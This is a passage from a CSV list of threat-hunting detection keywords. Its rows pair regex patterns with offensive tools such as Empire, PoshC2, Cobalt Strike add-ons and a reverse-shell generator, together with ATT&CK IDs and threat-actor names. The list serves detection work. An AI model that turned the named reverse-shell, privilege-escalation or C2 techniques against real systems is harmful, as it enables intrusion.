SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-BypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2560" "* PayloadsDirectory*",".{0,1000}\sPayloadsDirectory.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - 
TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2561" "* payloadtests.py*",".{0,1000}\spayloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","2562" "* PayloadType.BIND_TCP*",".{0,1000}\sPayloadType\.BIND_TCP.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","2563" "* --payload-types all*",".{0,1000}\s\-\-payload\-types\sall.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2564" "* --payload-types bin*",".{0,1000}\s\-\-payload\-types\sbin.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2565" "* --payload-types dll*",".{0,1000}\s\-\-payload\-types\sdll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2566" "* --payload-types exe*",".{0,1000}\s\-\-payload\-types\sexe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2567" "* --payload-types ps1*",".{0,1000}\s\-\-payload\-types\sps1.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2568" "* --payload-types py*",".{0,1000}\s\-\-payload\-types\spy.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2569" "* --payload-types svc.exe*",".{0,1000}\s\-\-payload\-types\ssvc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2570" "* --payload-types vbs*",".{0,1000}\s\-\-payload\-types\svbs.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2571" "* pcanywhere-brute.nse*",".{0,1000}\spcanywhere\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2572" "* pcworx-info.nse*",".{0,1000}\spcworx\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2576" "* pdf2john.py*",".{0,1000}\spdf2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2577" "* -PE_Clone *",".{0,1000}\s\-PE_Clone\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 
- T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","2578" "* -pe-exp-list *.dll*",".{0,1000}\s\-pe\-exp\-list\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - 
APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","2579" "* -PEPath * -ExeArgs *",".{0,1000}\s\-PEPath\s.{0,1000}\s\-ExeArgs\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - 
Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-PSInject.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2580" "* Perform S4U constrained delegation abuse*",".{0,1000}\sPerform\sS4U\sconstrained\sdelegation\sabuse.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","2581" "* perl-reverse-shell - *",".{0,1000}\sperl\-reverse\-shell\s\-\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","2582" "* -perm -2000 -o -perm -4000*",".{0,1000}\s\-perm\s\-2000\s\-o\s\-perm\s\-4000.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","2583" "* -PermanentWMI *",".{0,1000}\s\-PermanentWMI\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2585" "* Persist General 